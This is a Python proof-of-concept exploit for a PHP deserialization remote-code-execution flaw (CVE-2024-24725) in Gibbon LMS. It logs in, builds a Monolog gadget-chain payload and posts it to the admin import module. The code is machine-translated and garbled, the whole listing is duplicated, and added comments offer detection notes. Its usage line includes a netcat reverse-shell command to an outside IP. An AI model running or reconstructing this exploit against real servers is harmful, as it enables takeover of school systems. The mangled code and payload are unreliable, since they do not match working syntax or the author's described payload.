# Exploit Title: Gibbon LMS V26.0.00 - PHP Deserialization vulnerability
# Date: 22.01.2024
# Exploit Author: Secondx.io Research Team (Ali Maharramli, Fikrat Guliev, Islam Rzayev)
# Vendor Homepage: https://gibbonedu.org/
# Software Link: https://github.com/gibbonedu/core
# Version: V26.0.00
# Tested on: Ubuntu 22.0
# CVE : CVE-2024-24725
导入请求
导入
导入系统
导入基础64
导入Urllib.Parse
# Authenticate to the target Gibbon LMS instance and return its session cookie.
# NOTE(review): this listing is a machine-translated copy of the original PoC.
# Keywords, identifiers and literals were altered by the translation (e.g. `标题`
# for the headers dict, `ally_redirects=false`, `打印`/`印刷` for print, multipart
# boundary strings that are not consistent with each other), so the code is not
# executable as shown and must not be read as an authoritative reproduction of
# the request.
# Parameters:
#   target_host, target_port — host and port the login request is sent to.
#   电子邮件, 密码 — username and password placed in the multipart form body.
# Returns: the token at index 4 of the whitespace-split Set-Cookie header when the
#   (garbled) condition below holds; otherwise the function falls off the end and
#   returns None, which the caller passes on unchecked.
def登录(target_host,target_port,电子邮件,密码):
# Login endpoint of the application; the ` : ` spacing is a translation artefact.
url=f'http://{target_host} : {target_port}/login.php?timeout=true'
# Multipart Content-Type with a hard-coded boundary.
标题={'content-type':'multipart/form-data;边界=----------------------------------- 17447595731268836341556039466'}
# Hand-built multipart body carrying the address, method=default, username,
# password, gibbonSchoolYearID=025 and gibboni18nID=0002 fields.
data=f'---------------------------------------- 17447595731268836341556039466 \ r \ ncontent-disposition: form-data; name=\'address\'\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'method\'\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'username\'\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'password\'\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'gibbonSchoolYearID\'\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'gibboni18nID\'\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n'
# Redirects disabled (garbled `allow_redirects=False`) so the Set-Cookie and
# Location headers of the login response itself can be inspected.
r=requests.post(url,headers=标题,data=data,ally_redirects=false)
打印(URL)
印刷(R.Headers)
# Splits Set-Cookie on whitespace and uses the 5th token as the session cookie;
# indexing r.headers['set-cookie'] raises KeyError when the header is absent, and
# the fixed index is brittle against any change in cookie-attribute order.
session_cookie=re.split(r'\ s+',r.headers ['set-cookie'])
# Garbled condition — appears to test the Location header to decide that the
# login succeeded; confirm against the original source.
如果session_cookie [4]不是一个(r.headers ['location']):
打印('[x]登录成功!')
返回session_cookie [4]
# Build the serialized-PHP payload that the import handler deserializes.
# NOTE(review): per the author's comment below, the base64 blob decodes to a
# URL-encoded PHP object graph built from Monolog handler classes with two
# placeholders (COMMAND_SIZE, COMMAND) that are substituted here. The blob as
# printed in this copy is case-scrambled and contains spaces, so it no longer
# decodes to that text — treat it as illustrative only. The placeholder literals
# passed to replace() below are likewise translated/lower-cased and do not match
# the comment; both are translation artefacts.
# Defender notes: the root cause named in the title is deserialization of
# client-supplied data; the mitigation is not to unserialize() such input and to
# move to a patched release (the fixed version is not stated on this page).
# Detection can key on serialized-object markers (`a:`, `O:`, `Monolog\Handler`)
# arriving in form fields of the import module — see rce() below.
# Parameter: 命令 — the command string substituted for the COMMAND placeholder;
#   COMMAND_SIZE carries the length prefix PHP's serialization format requires
#   for that string.
# Returns: the substituted payload string.
Def Generate_Payload(命令):
# Author-supplied base64-encoded string.
### Decoded payload as documented by the author (mangled by translation; not authoritative):
### A:2: {I:7%3BO3BO3:32:'MONOLOL \ HANDLER \ SYSLOGUDPHANDLER':1: {S:93 3360'%00*%00socket'%3BO3BO3BO3:29:'MONOLOL \ HANDLER \ BUFFERHANDLER'3:733333333333333333333333 60 {S:10:'%00*%00 Handler'%3BR:3%3BS3:133:'%00*%00 00 Buffersize'%3BI3 3360-1%3BS:9:'%00*%00 buffer'%3BA3:1: {i3:0%3BA3:2: {i33:0% 3BS:COMMAND_SIZE:'COMMAND'%3BS3:5:'Level'%3BN%3B}} S3:8:'%00* %00 Level'%30亿%3BS:14:'%00*%00 Initialized'%3BB3:1%3BS3:14:'%00*%00 BufferLimit'%3BI:-1%3BS3:13:'%00*%00 00 00 00 00%3BA33:23: {I3:0% 3BS:7:'Current'%3BI:1%3BS3:6:'System'%3B}}}}}} i:7%3BI3:7%3B}
base64_encoded_string='ytoyontpojclm0jpojmyoijnb25vbg9nxehhbmrszxjcu3lzbg9nvwrwsgfuzgfuzgxlcii6mtp7czo 5OIILMDAQJTAWC29JA2V0IIUZQK86MJK6IK1VBM9SB2DCSGFUZGFUZGXLCLXCDWZMZXJIYW5KBGVYIJO 3ontzojewoiilmdaqjtawagfuzgxlciilm0jyojmlm0jzojezoiilmdaqjtawynvmzmzmvmvyu2l6zsi lm0jpoi0xjtncczo5oiiilmdaqjtawynvmzmvyiiuzqme6mtp7atowjtncytncytoyontoyontpojalm0jzoknp tu1btkrfu0lartoiq09ntuforcilm0jzoju6imxldmvsiiuzqk4lm0j9fxm6odoijtawkiuwmgxl DMVSIIUZQK4LM0JZOJE0OIIILMDAQJTAWAW5PDGLHBGL6ZWQIJTNCYTNCYJOXJTNCCCZZOXNDOIJTAWKIUW MGJ1ZMZLCKXPBWL0IIUZQMK6LTELM0JZOJEZOIILMDAQJTAWCHJVY2VZC2VZC29YCYILM0JHOJI6E2K6 mcuzqnm6nzoiy3vycmvudcilm0jpojelm0jzojy6inn5c3rlbsilm0j9fx1pojclm0jpojclm0j9'
# Byte length of the command, used for the PHP string-length prefix.
command_size=len(命令)
# Decode base64 (variable names `desded_*`/`decoded_*` are inconsistent in this copy).
desded_bytes=base64.b64decode(base64_encoded_string)
desded_string=decoded_bytes.decode('utf-8')
# URL-decode the result.
有效载荷=urllib.parse.unquote(decoded_string)
# Substitute the two placeholders in the decoded string.
有效载荷=pareload.replace('command_size',str(command_size))
有效载荷=pareload.replace('命令',命令)
打印('[x]有效载荷生成!')
退回有效载荷
# Send the payload to the External Assessment import step and print whatever the
# response shows as the live-run result.
# NOTE(review): URL and multipart body are garbled in this copy (query-string
# separators lost, boundary strings inconsistent, mixed `\ r \ n` spacing, the
# url literal is unterminated); the intent visible here is a POST to the
# System Admin import_run.php module with the payload placed in the
# `columnOrder` form field.
# Defender notes: a POST to import_run.php whose columnOrder value contains a
# serialized PHP object (`a:`/`O:` markers, Monolog\Handler class names) is a
# high-fidelity indicator for this CVE; the code below expects the command
# output to appear in the "Step 4 - Live Run" section of the response, so that
# section is also where post-incident review of saved responses should look.
# Parameters: cookie — session cookie from login(); target_host/target_port;
#   命令 — command forwarded verbatim to generate_payload().
# Returns: None. Side effects: prints the extracted result and writes the full
#   response body to pocresponse.html in the current working directory.
def rce(cookie,target_host,target_port,命令):
url=f'http://{target_host} : {target_port}/index.php?q=/modules/system/system%20admin/import_run.phptypy=externalAssessmentStep=4
# Session cookie from login() is sent as-is; if login() returned None this header
# value is None and the request will fail.
标题={'content-type':'multipart/form-data;边界=---------------------------------- 104550429928543086952438317710','cookie': cookie}
有效载荷=generate_payload(命令)
# Import-form fields (mode=sync, syncField=N, fieldDelimiter, stringEnclosure,
# filename, csvData header row, ignoreErrors=1, Failed=Submit); the payload is
# the value of columnOrder.
data=f'----------------------------------- 104550429928543086952438317710 \ r \ ncontent-disposition: form-data; name='address'\ r \ n \ r \ n/模块/系统admin/import_run.php \ r \ n ----------------------------------------------------------------- 104550429928543086952438317710 \ r \ r \ ncontent-disposition: form-data; name='mode'\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='syncField'\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='syncColumn'\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='columnOrder'\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:form-data; name='columnText'\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='fieldDelimiter'\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='stringEnclosure'\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='filename'\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='csvData'\r\n\r\n'External Assessment','Assessment Date','Student','Field Name Category','Field Name','Result'\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='ignoreErrors'\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='Failed'\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--'
# Redirects disabled (garbled `allow_redirects=False`).
r=requests.post(url,headers=标题,data=data,ally_redirects=false)
打印('[x]请求发送!')
# Locates the "Step 4 - Live Run" heading (HTML tags stripped by translation) and
# slices the text after it up to the next div. Neither find() result is checked
# for -1, so a response without that heading yields a meaningless slice.
start_index=r.text.find('H2Step 4-实时运行/H2')
end_index=r.text.find('div class',start_index)
结果=r.text [start_index+26:end_index] .strip()
如果结果!='':
打印('[x]执行结果: \ n'+结果)
其他:
print('[x]命令失败或没有输出任何内容。')
# Garbled `with open(...) as f:` — the full response body is saved for offline
# inspection.
开放('pocresponse.html','wb')为f:
F.Write(R.Content)
# Script entry point (garbled `if __name__ == '__main__':`): expects exactly five
# positional arguments. argv[1..4] go to login(); argv[5] is the command string
# handed to rce() verbatim. Exits with status 1 when the count is wrong.
# NOTE(review): the usage text describes argv[2] as "port/url", but the URL
# builders in login() and rce() splice argv[2] in only as the port.
如果name=='__ -Main __':
如果Len(sys.argv)!=6:
print('[x] usage: script.py target_host target_port/url电子邮件密码命令')
print('[x]示例: python gibbon_rce.py 192.168.1.1.100 80/gibbon [email protected] password1 \'./nc -e/bin/bin/bash 172.28.218.3 44444444444444444444444 \''')
sys.exit(1)
# The login() return value is not checked before being used as the cookie.
cookie=login(sys.argv [1],sys.argv [2],sys.argv [3],sys.argv [4])
RCE(cookie,sys.argv [1],sys.argv [2],sys.argv [5])
# Date: 22.01.2024
# Exploit Author: Secondx.io Research Team (Ali Maharramli, Fikrat Guliev, Islam Rzayev)
# Vendor Homepage: https://gibbonedu.org/
# Software Link: https://github.com/gibbonedu/core
# Version: V26.0.00
# Tested on: Ubuntu 22.0
# CVE : CVE-2024-24725
导入请求
导入
导入系统
导入基础64
导入Urllib.Parse
# Authenticate to the target Gibbon LMS instance and return its session cookie.
# NOTE(review): this listing is a machine-translated copy of the original PoC
# (and this is its second, duplicated occurrence in the file). Keywords,
# identifiers and literals were altered by the translation (e.g. `标题` for the
# headers dict, `ally_redirects=false`, `打印`/`印刷` for print, multipart
# boundary strings that are not consistent with each other), so the code is not
# executable as shown and must not be read as an authoritative reproduction of
# the request.
# Parameters:
#   target_host, target_port — host and port the login request is sent to.
#   电子邮件, 密码 — username and password placed in the multipart form body.
# Returns: the token at index 4 of the whitespace-split Set-Cookie header when the
#   (garbled) condition below holds; otherwise the function falls off the end and
#   returns None, which the caller passes on unchecked.
def登录(target_host,target_port,电子邮件,密码):
# Login endpoint of the application; the ` : ` spacing is a translation artefact.
url=f'http://{target_host} : {target_port}/login.php?timeout=true'
# Multipart Content-Type with a hard-coded boundary.
标题={'content-type':'multipart/form-data;边界=----------------------------------- 17447595731268836341556039466'}
# Hand-built multipart body carrying the address, method=default, username,
# password, gibbonSchoolYearID=025 and gibboni18nID=0002 fields.
data=f'---------------------------------------- 17447595731268836341556039466 \ r \ ncontent-disposition: form-data; name=\'address\'\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'method\'\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'username\'\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'password\'\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'gibbonSchoolYearID\'\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'gibboni18nID\'\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n'
# Redirects disabled (garbled `allow_redirects=False`) so the Set-Cookie and
# Location headers of the login response itself can be inspected.
r=requests.post(url,headers=标题,data=data,ally_redirects=false)
打印(URL)
印刷(R.Headers)
# Splits Set-Cookie on whitespace and uses the 5th token as the session cookie;
# indexing r.headers['set-cookie'] raises KeyError when the header is absent, and
# the fixed index is brittle against any change in cookie-attribute order.
session_cookie=re.split(r'\ s+',r.headers ['set-cookie'])
# Garbled condition — appears to test the Location header to decide that the
# login succeeded; confirm against the original source.
如果session_cookie [4]不是一个(r.headers ['location']):
打印('[x]登录成功!')
返回session_cookie [4]
# Build the serialized-PHP payload that the import handler deserializes.
# NOTE(review): per the author's comment below, the base64 blob decodes to a
# URL-encoded PHP object graph built from Monolog handler classes with two
# placeholders (COMMAND_SIZE, COMMAND) that are substituted here. The blob as
# printed in this copy is case-scrambled and contains spaces, so it no longer
# decodes to that text — treat it as illustrative only. The placeholder literals
# passed to replace() below are likewise translated/lower-cased and do not match
# the comment; both are translation artefacts.
# Defender notes: the root cause named in the title is deserialization of
# client-supplied data; the mitigation is not to unserialize() such input and to
# move to a patched release (the fixed version is not stated on this page).
# Detection can key on serialized-object markers (`a:`, `O:`, `Monolog\Handler`)
# arriving in form fields of the import module — see rce() below.
# Parameter: 命令 — the command string substituted for the COMMAND placeholder;
#   COMMAND_SIZE carries the length prefix PHP's serialization format requires
#   for that string.
# Returns: the substituted payload string.
Def Generate_Payload(命令):
# Author-supplied base64-encoded string.
### Decoded payload as documented by the author (mangled by translation; not authoritative):
### A:2: {I:7%3BO3BO3:32:'MONOLOL \ HANDLER \ SYSLOGUDPHANDLER':1: {S:93 3360'%00*%00socket'%3BO3BO3BO3:29:'MONOLOL \ HANDLER \ BUFFERHANDLER'3:733333333333333333333333 60 {S:10:'%00*%00 Handler'%3BR:3%3BS3:133:'%00*%00 00 Buffersize'%3BI3 3360-1%3BS:9:'%00*%00 buffer'%3BA3:1: {i3:0%3BA3:2: {i33:0% 3BS:COMMAND_SIZE:'COMMAND'%3BS3:5:'Level'%3BN%3B}} S3:8:'%00* %00 Level'%30亿%3BS:14:'%00*%00 Initialized'%3BB3:1%3BS3:14:'%00*%00 BufferLimit'%3BI:-1%3BS3:13:'%00*%00 00 00 00 00%3BA33:23: {I3:0% 3BS:7:'Current'%3BI:1%3BS3:6:'System'%3B}}}}}} i:7%3BI3:7%3B}
base64_encoded_string='ytoyontpojclm0jpojmyoijnb25vbg9nxehhbmrszxjcu3lzbg9nvwrwsgfuzgfuzgxlcii6mtp7czo 5OIILMDAQJTAWC29JA2V0IIUZQK86MJK6IK1VBM9SB2DCSGFUZGFUZGXLCLXCDWZMZXJIYW5KBGVYIJO 3ontzojewoiilmdaqjtawagfuzgxlciilm0jyojmlm0jzojezoiilmdaqjtawynvmzmzmvmvyu2l6zsi lm0jpoi0xjtncczo5oiiilmdaqjtawynvmzmvyiiuzqme6mtp7atowjtncytncytoyontoyontpojalm0jzoknp tu1btkrfu0lartoiq09ntuforcilm0jzoju6imxldmvsiiuzqk4lm0j9fxm6odoijtawkiuwmgxl DMVSIIUZQK4LM0JZOJE0OIIILMDAQJTAWAW5PDGLHBGL6ZWQIJTNCYTNCYJOXJTNCCCZZOXNDOIJTAWKIUW MGJ1ZMZLCKXPBWL0IIUZQMK6LTELM0JZOJEZOIILMDAQJTAWCHJVY2VZC2VZC29YCYILM0JHOJI6E2K6 mcuzqnm6nzoiy3vycmvudcilm0jpojelm0jzojy6inn5c3rlbsilm0j9fx1pojclm0jpojclm0j9'
# Byte length of the command, used for the PHP string-length prefix.
command_size=len(命令)
# Decode base64 (variable names `desded_*`/`decoded_*` are inconsistent in this copy).
desded_bytes=base64.b64decode(base64_encoded_string)
desded_string=decoded_bytes.decode('utf-8')
# URL-decode the result.
有效载荷=urllib.parse.unquote(decoded_string)
# Substitute the two placeholders in the decoded string.
有效载荷=pareload.replace('command_size',str(command_size))
有效载荷=pareload.replace('命令',命令)
打印('[x]有效载荷生成!')
退回有效载荷
# Send the payload to the External Assessment import step and print whatever the
# response shows as the live-run result.
# NOTE(review): URL and multipart body are garbled in this copy (query-string
# separators lost, boundary strings inconsistent, mixed `\ r \ n` spacing, the
# url literal is unterminated); the intent visible here is a POST to the
# System Admin import_run.php module with the payload placed in the
# `columnOrder` form field.
# Defender notes: a POST to import_run.php whose columnOrder value contains a
# serialized PHP object (`a:`/`O:` markers, Monolog\Handler class names) is a
# high-fidelity indicator for this CVE; the code below expects the command
# output to appear in the "Step 4 - Live Run" section of the response, so that
# section is also where post-incident review of saved responses should look.
# Parameters: cookie — session cookie from login(); target_host/target_port;
#   命令 — command forwarded verbatim to generate_payload().
# Returns: None. Side effects: prints the extracted result and writes the full
#   response body to pocresponse.html in the current working directory.
def rce(cookie,target_host,target_port,命令):
url=f'http://{target_host} : {target_port}/index.php?q=/modules/system/system%20admin/import_run.phptypy=externalAssessmentStep=4
# Session cookie from login() is sent as-is; if login() returned None this header
# value is None and the request will fail.
标题={'content-type':'multipart/form-data;边界=---------------------------------- 104550429928543086952438317710','cookie': cookie}
有效载荷=generate_payload(命令)
# Import-form fields (mode=sync, syncField=N, fieldDelimiter, stringEnclosure,
# filename, csvData header row, ignoreErrors=1, Failed=Submit); the payload is
# the value of columnOrder.
data=f'----------------------------------- 104550429928543086952438317710 \ r \ ncontent-disposition: form-data; name='address'\ r \ n \ r \ n/模块/系统admin/import_run.php \ r \ n ----------------------------------------------------------------- 104550429928543086952438317710 \ r \ r \ ncontent-disposition: form-data; name='mode'\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='syncField'\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='syncColumn'\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='columnOrder'\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:form-data; name='columnText'\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='fieldDelimiter'\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='stringEnclosure'\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='filename'\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='csvData'\r\n\r\n'External Assessment','Assessment Date','Student','Field Name Category','Field Name','Result'\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='ignoreErrors'\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='Failed'\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--'
# Redirects disabled (garbled `allow_redirects=False`).
r=requests.post(url,headers=标题,data=data,ally_redirects=false)
打印('[x]请求发送!')
# Locates the "Step 4 - Live Run" heading (HTML tags stripped by translation) and
# slices the text after it up to the next div. Neither find() result is checked
# for -1, so a response without that heading yields a meaningless slice.
start_index=r.text.find('H2Step 4-实时运行/H2')
end_index=r.text.find('div class',start_index)
结果=r.text [start_index+26:end_index] .strip()
如果结果!='':
打印('[x]执行结果: \ n'+结果)
其他:
print('[x]命令失败或没有输出任何内容。')
# Garbled `with open(...) as f:` — the full response body is saved for offline
# inspection.
开放('pocresponse.html','wb')为f:
F.Write(R.Content)
# Script entry point (garbled `if __name__ == '__main__':`): expects exactly five
# positional arguments. argv[1..4] go to login(); argv[5] is the command string
# handed to rce() verbatim. Exits with status 1 when the count is wrong.
# NOTE(review): the usage text describes argv[2] as "port/url", but the URL
# builders in login() and rce() splice argv[2] in only as the port.
如果name=='__ -Main __':
如果Len(sys.argv)!=6:
print('[x] usage: script.py target_host target_port/url电子邮件密码命令')
print('[x]示例: python gibbon_rce.py 192.168.1.1.100 80/gibbon [email protected] password1 \'./nc -e/bin/bin/bash 172.28.218.3 44444444444444444444444 \''')
sys.exit(1)
# The login() return value is not checked before being used as the cookie.
cookie=login(sys.argv [1],sys.argv [2],sys.argv [3],sys.argv [4])
RCE(cookie,sys.argv [1],sys.argv [2],sys.argv [5])